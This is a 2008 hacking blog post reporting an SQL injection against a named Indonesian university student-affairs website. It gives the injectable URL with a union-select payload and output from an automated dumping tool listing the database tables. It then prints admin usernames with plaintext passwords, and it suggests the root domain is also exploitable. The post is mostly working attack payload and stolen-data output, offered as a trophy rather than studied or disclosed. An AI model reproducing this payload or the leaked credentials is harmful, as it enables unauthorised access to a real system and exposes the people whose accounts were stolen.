viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, September 30, 2008

[SQLi] http://kemahasiswaan.umm.ac.id

8:09 PM Posted by viperfx07 No comments
login info (usr:pwd) = athox:mayax
I think it can be the exploit for the root domain, too.
[+] URL:http://kemahasiswaan.umm.ac.id/detail.php?id_lowongan=-46+union+select+1,2,3,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kemahasiswaan
User: guest@10.10.1.1
Version: 5.0.27
[+] Showing Tables & Columns from database "kemahasiswaan"
[+] 17:03:41
[+] Number of Tables: 7

[Database]: kemahasiswaan
[Table: Columns]
[0]admin: id_user,user,password,nama,status,level
[1]agenda: id_agenda,judul,tanggal,agenda_awal,agenda_akhir
[2]beasiswa: id_beasiswa,judul,tanggal,beasiswa
[3]berita: id_berita,judul,tanggal,berita_awal,berita_akhir
[4]level: id_level,level
[5]lowongan: id_lowongan,judul,tanggal,lowongan
[6]menu: id_menu

[-] [17:03:55]
[-] Total URL Requests 28
[-] Done

|---------------------------------------------------------------|

[+] URL:http://kemahasiswaan.umm.ac.id/detail.php?id_lowongan=-46+union+select+1,2,3,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kemahasiswaan
User: guest@10.10.1.1
Version: 5.0.27
[+] Dumping data from database "kemahasiswaan" Table "admin"
[+] Column(s) ['user', 'password']
[+] 17:04:14
[+] Number of Rows: 5

[0] athox:mayax:
[1] clock:defist:
[2] santoso:suga:
[3] heru:heru:
[4] jokosis:jokosis:

[-] [17:04:16]
[-] Total URL Requests 6
[-] Done

0 comments:

Post a Comment